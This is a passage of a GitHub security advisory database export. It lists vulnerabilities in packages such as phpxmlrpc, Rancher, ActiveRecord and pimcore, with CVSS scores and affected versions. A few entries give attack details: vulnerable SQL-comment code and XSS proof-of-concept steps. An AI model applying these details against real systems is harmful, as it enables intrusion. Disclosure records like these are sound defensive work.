of method `Client::send()`, in conjunction with conditions which trigger usage of curl as http transport (ie. either using the https, http11 or http2 protocols, or calling `Client::setUseCurl()` beforehand) - either have set the Clients `return_type` property to 'xml', or make the resulting Response's object `httpResponse` member, which is intended to be used for debugging purposes only, available to 3rd parties, eg. by displaying it to the end user or serializing it in some storage (note that the same data can also be accessed via magic property `Response::raw_data`, and in the Request's `httpResponse` member) This is most likely a very uncommon usage scenario, and as such the chances of exploitation of this issue may be low. If it is not possible to upgrade to this release of the library at this time, a proactive security measure, to avoid the Client accessing any local file on the server which hosts it, is to add the following call to your code: $client->setCurlOptions([CURLOPT_PROTOCOLS, CURLPROTO_HTTPS|CURLPROTO_HTTP]); Originally reported as issue #81",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'phpxmlrpc/phpxmlrpc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gggeek/phpxmlrpc/security/advisories/GHSA-m95x-m25c-w9mp'}, {'type': 'WEB', 'url': 'https://github.com/gggeek/phpxmlrpc/issues/81'}, {'type': 'WEB', 'url': 'https://github.com/gggeek/phpxmlrpc/commit/cf6e605e09d001ce520bfa8e7b168cfa514e663b'}, {'type': 'PACKAGE', 'url': 'https://github.com/gggeek/phpxmlrpc'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-11T23:54:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-h6c2-879r-jffh,2023-02-08T21:56:36Z,2023-01-31T18:30:22Z,,['CVE-2022-45598'],Joplin Desktop App vulnerable to Cross-site Scripting,Cross Site Scripting vulnerability in Joplin Desktop App before v2.9.17 allows attacker to execute arbitrary code via improper santization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'joplin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-45598'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/commit/a2de167b95debad83a0f0c7925a88c0198db812e'}, {'type': 'PACKAGE', 'url': 'https://github.com/laurent22/joplin'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/releases/tag/v2.9.17'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T21:56:36Z', 'nvd_published_at': '2023-01-31T16:15:00Z'}" 1.4.0,GHSA-69f2-4375-qv9h,2023-02-02T10:31:55Z,2023-01-26T21:30:27Z,,['CVE-2022-21810'],Command injection in smartctl,All versions of the package smartctl are vulnerable to Command Injection via the info method due to improper input sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'smartctl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-21810'}, {'type': 'WEB', 'url': 'https://github.com/baslr/node-smartctl/blob/f61266084d5b3e4baae9bd85f67ec4ec6a716736/index.js#23L18'}, {'type': 'WEB', 'url': 'https://github.com/baslr/node-smartctl/blob/f61266084d5b3e4baae9bd85f67ec4ec6a716736/index.js%23L18'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-SMARTCTL-3175613'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:02:28Z', 'nvd_published_at': '2023-01-26T21:15:00Z'}" 1.4.0,GHSA-4r2f-6fm9-2qgh,2023-01-13T19:21:37Z,2023-01-10T06:30:25Z,,['CVE-2017-20166'],Ecto lacks a protection mechanism,Ecto 2.2.0 lacks a certain protection mechanism associated with the interaction between `is_nil` and `raise`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Hex', 'name': 'ecto'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-20166'}, {'type': 'WEB', 'url': 'https://github.com/elixir-ecto/ecto/pull/2125'}, {'type': 'WEB', 'url': 'https://github.com/elixir-ecto/ecto/commit/db55b0cba6525c24ebddc88ef9ae0c1c00620250'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-2xxx-fhc8-9qvq'}, {'type': 'PACKAGE', 'url': 'https://github.com/elixir-ecto/ecto'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/elixir-ecto/0m4NPfg_MMU'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-10T22:16:53Z', 'nvd_published_at': '2023-01-10T06:15:00Z'}" 1.4.0,GHSA-636f-xm5j-pj9m,2023-01-24T18:12:17Z,2023-01-24T18:12:17Z,,[],Several quadratic complexity bugs may lead to denial of service in Commonmarker,"## Impact Several quadratic complexity bugs in commonmarker's underlying [`cmark-gfm`](https://github.com/github/cmark-gfm) library may lead to unbounded resource exhaustion and subsequent denial of service. The following vulnerabilities were addressed: * [CVE-2023-22483](https://github.com/github/cmark-gfm/security/advisories/GHSA-29g3-96g3-jg6c) * [CVE-2023-22484](https://github.com/github/cmark-gfm/security/advisories/GHSA-24f7-9frr-5h2r) * [CVE-2023-22485](https://github.com/github/cmark-gfm/security/advisories/GHSA-c944-cv5f-hpvr) * [CVE-2023-22486](https://github.com/github/cmark-gfm/security/advisories/GHSA-r572-jvj2-3m8p) For more information, consult the release notes for version [`0.23.0.gfm.7`](https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.7). ## Mitigation Users are advised to upgrade to commonmarker version [`0.23.7`](https://rubygems.org/gems/commonmarker/versions/0.23.7).",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'commonmarker'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-636f-xm5j-pj9m'}, {'type': 'PACKAGE', 'url': 'https://github.com/gjtorikian/commonmarker'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-24T18:12:17Z', 'nvd_published_at': None}" 1.4.0,GHSA-cf5r-3pvm-w64w,2023-01-10T22:59:29Z,2023-01-04T12:30:29Z,,['CVE-2019-25094'],typo3-appointments vulnerable to Cross-site Scripting,"A vulnerability, which was classified as problematic, was found in innologi appointments Extension up to 2.0.5. This affects an unknown part of the component Appointment Handler. The manipulation of the argument formfield leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 2.0.6 is able to address this issue. The name of the patch is 986d3cb34e5e086c6f04e061f600ffc5837abe7f. It is recommended to upgrade the affected component. The identifier VDB-217353 was assigned to this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'innologi/typo3-appointments'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25094'}, {'type': 'WEB', 'url': 'https://github.com/innologi/typo3-appointments/commit/986d3cb34e5e086c6f04e061f600ffc5837abe7f'}, {'type': 'PACKAGE', 'url': 'https://github.com/innologi/typo3-appointments'}, {'type': 'WEB', 'url': 'https://github.com/innologi/typo3-appointments/releases/tag/2.0.6'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217353'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217353'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-10T22:59:29Z', 'nvd_published_at': '2023-01-04T10:15:00Z'}" 1.4.0,GHSA-x347-fc9w-w7c3,2023-01-09T20:06:35Z,2023-01-06T00:30:17Z,,['CVE-2021-32828'],Nuxeo vulnerable to Reflected Cross-Site Scripting leading to Remote Code Execution,"The Nuxeo Platform is an open source content management platform for building business applications. In version 11.5.109, the `oauth2` REST API is vulnerable to Reflected Cross-Site Scripting (XSS). This XSS can be escalated to Remote Code Execution (RCE) by levering the automation API.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.nuxeo.ecm.platform:nuxeo-platform-oauth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '10.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32828'}, {'type': 'PACKAGE', 'url': 'https://github.com/nuxeo/nuxeo'}, {'type': 'WEB', 'url': 'https://github.com/nuxeo/nuxeo/blob/master/modules/platform/nuxeo-platform-oauth/src/main/java/org/nuxeo/ecm/webengine/oauth2/OAuth2Callback.java'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-072-nuxeo'}]","{'cwe_ids': ['CWE-502', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T20:06:35Z', 'nvd_published_at': '2023-01-05T23:15:00Z'}" 1.4.0,GHSA-34p5-jp77-fcrc,2023-02-15T18:37:48Z,2023-01-25T19:36:35Z,,['CVE-2022-43758'],Command injection in Rancher Git package,"### Impact An issue was discovered in Rancher from versions 2.5.0 up to and including 2.5.16, 2.6.0 up to and including 2.6.9 and 2.7.0, where a command injection vulnerability is present in the Rancher Git package. This package uses the underlying Git binary available in the Rancher container image to execute Git operations. Specially crafted commands, when not properly disambiguated, can cause confusion when executed through Git, resulting in command injection in the underlying Rancher host. This issue can potentially be exploited in Rancher in two ways: 1. Adding an untrusted Helm catalog, in the Catalogs menu, that contains maliciously designed repo URL configuration in Helm charts. 2. Modifying the URL configuration used to download KDM (Kontainer Driver Metadata) releases. By default, only the Rancher admin has permission to manage both configurations for the local cluster (the cluster where Rancher is provisioned). Note: More information about this category of issue in version control system (VCS) tools are available in Snyk's [blog post](https://snyk.io/blog/argument-injection-when-using-git-and-mercurial/). ### Workarounds Except for only adding trusted catalogs and the KDM URL to Rancher, there is no other workaround besides updating Rancher to a patched version. ### Patches Patched versions include releases 2.5.17, 2.6.10, 2.7.1 and later versions. It is also important to update to a patched version in case Rancher or its standalone Git package implementation is used as a Go library instead of the application itself. Otherwise, this vulnerability might affect your dependent code. ### For more information If you have any questions or comments about this advisory: * Reach out to [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries. * Open an issue in [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository. * Verify our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.17'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.10'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rancher/rancher/security/advisories/GHSA-34p5-jp77-fcrc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-43758'}, {'type': 'WEB', 'url': 'https://bugzilla.suse.com/show_bug.cgi?id=1205294'}, {'type': 'PACKAGE', 'url': 'https://github.com/rancher/rancher'}]","{'cwe_ids': ['CWE-77', 'CWE-78', 'CWE-88'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-25T19:36:35Z', 'nvd_published_at': '2023-02-07T13:15:00Z'}" 1.4.0,GHSA-pfrm-4rjw-g9q5,2023-01-10T16:13:19Z,2023-01-02T09:31:57Z,,['CVE-2021-4299'],string-kit Inefficient Regular Expression Complexity vulnerability,A vulnerability classified as problematic was found in cronvel string-kit up to 0.12.7. This vulnerability affects the function naturalSort of the file lib/naturalSort.js. The manipulation leads to inefficient regular expression complexity. The attack can be initiated remotely. Upgrading to version 0.12.8 can address this issue. The name of the patch is 9cac4c298ee92c1695b0695951f1488884a7ca73. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217180.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'string-kit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4299'}, {'type': 'WEB', 'url': 'https://github.com/cronvel/string-kit/commit/9cac4c298ee92c1695b0695951f1488884a7ca73'}, {'type': 'PACKAGE', 'url': 'https://github.com/cronvel/string-kit'}, {'type': 'WEB', 'url': 'https://github.com/cronvel/string-kit/releases/tag/v0.12.8'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217180'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217180'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-04T14:27:35Z', 'nvd_published_at': '2023-01-02T08:15:00Z'}" 1.4.0,GHSA-9jff-8xmm-mw22,2023-01-23T18:50:01Z,2023-01-16T00:30:24Z,,['CVE-2023-0310'],phpMyFAQ Stored Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0310'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/53099a9bcc928f5f6f7cce111c04b79a72a04142'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/051d5e20-7fab-4769-bd7d-d986b804bb5a'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T22:02:01Z', 'nvd_published_at': '2023-01-15T22:15:00Z'}" 1.4.0,GHSA-3w9w-9833-gcpv,2023-02-08T22:38:31Z,2023-01-26T19:52:50Z,,[],Security bug in ConvertToSinglePlane when used with untrusted content from the DDS loader,"### Impact A memory overwrite bug was reported by a security researcher in the **ConvertToSinglePlane** method via the *texconv* command-line tool when given an invalid height for planar video textures such as NV12. This can be a potential security bug for any clients of the library who follow the same pattern. This issue *does not* impact use of the DDS texture loader itself, only when combined with `ConvertToSinglePlane` for converting multi-planar video formats. All other functions in the library fail immediately if given images in planar formats. ### Patches The fix to the specific area as well as general hardening can be found in [this PR](https://github.com/microsoft/DirectXTex/pull/307) and will be included in the This bug has been fixed in the January 31, 2023 or later release of DirectXTex. ### Workarounds If your code makes use of **ConvertToSinglePlane**, you can validate that the width & height alignment requirements are met for the input image before calling the function. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'directxtex_desktop_2019'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2023.1.31.1'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'directxtex_desktop_win10'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2023.1.31.1'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'directxtex_uwp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2023.1.31.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/microsoft/DirectXTex/security/advisories/GHSA-3w9w-9833-gcpv'}, {'type': 'WEB', 'url': 'https://github.com/microsoft/DirectXTex/pull/307'}, {'type': 'PACKAGE', 'url': 'https://github.com/microsoft/DirectXTex'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-26T19:52:50Z', 'nvd_published_at': None}" 1.4.0,GHSA-pcvh-px2p-vmxw,2023-01-12T16:49:37Z,2023-01-07T06:30:20Z,,['CVE-2023-0107'],usememos/memos vulnerable to stored Cross-site Scripting,Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/usememos/memos'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0107'}, {'type': 'WEB', 'url': 'https://github.com/usememos/memos/commit/0f8ce3dd1696722f951d7195ad1f88b39a5d15d7'}, {'type': 'PACKAGE', 'url': 'https://github.com/usememos/memos'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0b28fa57-acb0-47c8-ac48-962ff3898156'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T21:54:06Z', 'nvd_published_at': '2023-01-07T04:15:00Z'}" 1.4.0,GHSA-54w6-vxfh-fw7f,2023-01-06T20:24:36Z,2023-01-06T20:24:36Z,,['CVE-2023-22465'],Http4s improperly parses User-Agent and Server headers,"### Impact The `User-Agent` and `Server` header parsers are susceptible to a fatal error on certain inputs. In http4s, modeled headers are lazily parsed, so this only applies to services that explicitly request these typed headers. #### v0.21.x ```scala val unsafe: Option[`User-Agent`] = req.headers.get(`User-Agent`) ``` #### v0.22.x, v0.23.x, v1.x ```scala val unsafe: Option[`User-Agent`] = req.headers.get[`User-Agent`] val alsoUnsafe: Option[`Server`] = req.headers.get[Server] ``` ### Patches Fixes are released in 0.21.34, 0.22.15, 0.23.17, and 1.0.0-M38. ### Workarounds #### Use the weakly typed header interface ##### v0.21.x ```scala val safe: Option[Header] = req.headers.get(""User-Agent"".ci) // but don't do this val unsafe = header.map(_.parsed) ``` ##### v0.22.x, v0.23.x, v1.x ```scala val safe: Option[Header] = req.headers.get(ci""User-Agent"") ```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.0'}, {'fixed': '0.21.34'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.22.0'}, {'fixed': '0.22.15'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.23.0'}, {'fixed': '0.23.17'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0-M1'}, {'fixed': '1.0.0-M38'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/http4s/http4s/security/advisories/GHSA-54w6-vxfh-fw7f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22465'}, {'type': 'PACKAGE', 'url': 'https://github.com/http4s/http4s'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-06T20:24:36Z', 'nvd_published_at': '2023-01-04T16:15:00Z'}" 1.4.0,GHSA-85gf-wr67-f83w,2023-01-24T18:54:27Z,2023-01-16T12:30:17Z,,['CVE-2015-10053'],curupira is vulnerable to SQL injection,A vulnerability classified as critical has been found in prodigasistemas curupira up to 0.1.3. Affected is an unknown function of the file app/controllers/curupira/passwords_controller.rb. The manipulation leads to sql injection. Upgrading to version 0.1.4 is able to address this issue. The name of the patch is 93a9a77896bb66c949acb8e64bceafc74bc8c271. It is recommended to upgrade the affected component. VDB-218394 is the identifier assigned to this vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'curupira'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-10053'}, {'type': 'WEB', 'url': 'https://github.com/prodigasistemas/curupira/commit/93a9a77896bb66c949acb8e64bceafc74bc8c271'}, {'type': 'PACKAGE', 'url': 'https://github.com/prodigasistemas/curupira'}, {'type': 'WEB', 'url': 'https://github.com/prodigasistemas/curupira/releases/tag/v0.1.4'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/curupira/CVE-2015-10053.yml'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.218394'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.218394'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-18T19:03:31Z', 'nvd_published_at': '2023-01-16T12:15:00Z'}" 1.4.0,GHSA-hq7p-j377-6v63,2023-05-16T15:47:47Z,2023-01-18T18:20:19Z,,['CVE-2023-22794'],SQL Injection Vulnerability via ActiveRecord comments,"There is a possible vulnerability in ActiveRecord related to the sanitization of comments. This vulnerability has been assigned the CVE identifier CVE-2023-22794. Versions Affected: >= 6.0.0 Not affected: < 6.0.0 Fixed Versions: 6.0.6.1, 6.1.7.1, 7.0.4.1 Impact Previously the implementation of escaping for comments was insufficient for If malicious user input is passed to either the annotate query method, the optimizer_hints query method, or through the QueryLogs interface which automatically adds annotations, it may be sent to the database with insufficient sanitization and be able to inject SQL outside of the comment. In most cases these interfaces won’t be used with user input and users should avoid doing so. Example vulnerable code: ``` Post.where(id: 1).annotate(""#{params[:user_input]}"") Post.where(id: 1).optimizer_hints(""#{params[:user_input]}"") ``` Example vulnerable QueryLogs configuration (the default configuration is not vulnerable): ``` config.active_record.query_log_tags = [ { something: -> { } } ] ``` All users running an affected release should either upgrade or use one of the workarounds immediately. Releases The FIXED releases are available at the normal locations. Workarounds Avoid passing user input to annotate and avoid using QueryLogs configuration which can include user input. Patches To aid users who aren’t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. 6-0-Make-sanitize_as_sql_comment-more-strict.patch - Patch for 6.0 series 6-1-Make-sanitize_as_sql_comment-more-strict.patch - Patch for 6.1 series 7-0-Make-sanitize_as_sql_comment-more-strict.patch - Patch for 7.0 series Please note that only the 7.0.Z and 6.1.Z series are supported at present, and 6.0.Z for severe vulnerabilities. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'activerecord'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.6.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'activerecord'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.7.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'activerecord'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22794'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/d7aba06953f9fa789c411676b941d20df8ef73de'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2023-22794-sql-injection-vulnerability-via-activerecord-comments/82117'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/releases/tag/v7.0.4.1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activerecord/CVE-2023-22794.yml'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5372'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-18T18:20:19Z', 'nvd_published_at': '2023-02-09T20:15:00Z'}" 1.4.0,GHSA-67w4-w877-jv29,2023-02-03T20:34:12Z,2023-01-26T21:30:17Z,,['CVE-2023-24459'],Missing permission check in Jenkins BearyChat Plugin,A missing permission check in Jenkins BearyChat Plugin 3.0.2 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:bearychat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24459'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2745'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T00:57:37Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-6vf6-g3pr-j83h,2023-01-24T18:56:50Z,2023-01-20T16:55:24Z,,['CVE-2023-0323'],"pimcore is vulnerable to cross-site scripting via ""title field "" in data objects","### Impact The vulnerability is capable of resulting in stolen user cookies. #### Proof of Concept ``` Login with dev account https://11.x-dev.pimcore.fun/admin/?_dc=1670962076&perspective= Go to setting --> data objects --> classes --> events Click media under genaral settings Add payload in title field. Go to data objects module and open events, xss will trigger // PoC.js ""> ``` ### Patches Update to version 10.5.14 or apply this patch manually https://github.com/pimcore/pimcore/pull/13916.patch ### Workarounds Apply https://github.com/pimcore/pimcore/pull/13916.patch manually. ### References https://huntr.dev/bounties/129d6a4b-0504-4de1-a72c-3f12c4552343/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.14'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-6vf6-g3pr-j83h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0323'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/13916.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/746fac1a342841624f63ab13edcd340358e1bc04'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/129d6a4b-0504-4de1-a72c-3f12c4552343'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T16:55:24Z', 'nvd_published_at': '2023-01-16T15:15:00Z'}" 1.4.0,GHSA-2jpx-h8j2-g8m4,2023-02-03T20:46:00Z,2023-01-26T21:30:18Z,,['CVE-2023-24425'],Exposure of system-scoped Kubernetes credentials in Jenkins Kubernetes Credentials Provider Plugin,"Jenkins Kubernetes Credentials Provider Plugin 1.208.v128ee9800c04 and earlier does not set the appropriate context for Kubernetes credentials lookup, allowing attackers with Item/Configure permission to access and potentially capture Kubernetes credentials they are not entitled to.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': 